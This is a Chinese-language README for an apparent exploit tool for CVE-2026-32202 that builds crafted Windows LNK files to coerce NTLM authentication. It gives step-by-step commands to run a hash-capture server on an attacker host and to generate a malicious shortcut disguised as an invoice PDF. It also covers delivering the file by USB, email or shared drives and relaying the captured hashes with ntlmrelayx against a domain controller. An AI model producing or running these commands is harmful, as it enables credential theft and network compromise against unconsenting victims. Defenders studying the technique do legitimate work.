免责声明
本工具仅用于授权的红队演练和渗透测试。
未经明确许可对系统进行未授权使用属违法行为。
使用风险自负。作者对任何滥用或损害不承担任何责任。
描述
通过不完整的 Windows Shell 保护绕过(CVE-2026-32202)实现 NTLMv2 哈希强制获取。生成特制的 LNK 文件,在资源管理器中打开或预览时强制进行 SMB/UNC 身份验证。低交互性,在 2026 年 4 月修复不充分的已修补系统上仍然有效。已在实战中积极使用。
主要特性
该漏洞利用的作用
该工具创建一个特制的 .LNK 文件,滥用 Shell 对 Target + IconEnvironmentDataBlock / ExtraData 结构中 UNC 路径的处理。当受害者浏览文件夹或悬停/预览文件时,Windows Shell 会向攻击者控制的 UNC 发起 SMB 连接,泄露机器/用户的 Net-NTLMv2 哈希。目标上不执行代码——仅进行凭据强制获取,用于中继或破解。
为何有用
已测试环境
依赖项
安装:pip install -r requirements.txt
使用方法
# 1. 启动捕获服务器(攻击者主机)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. 生成恶意 LNK
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# 可选:稳定模式或绕过模式
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. 投递 LNK(U 盘、共享、邮件附件、OneDrive 等)
# 4. 在终端和文件中等待哈希。中继示例:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# 或 LDAP 中继用于 RBCD,HTTP 用于 ADCS 证书等
漏洞利用
局限性
根本原因(简述)
Windows Shell 对 LNK 图标/目标解析的 UNC 路径清理和 ExtraData 块处理存在不完整修复。本应阻止未授权网络欺骗的保护机制在 Shell 命名空间枚举期间仍会触发 NTLM 身份验证。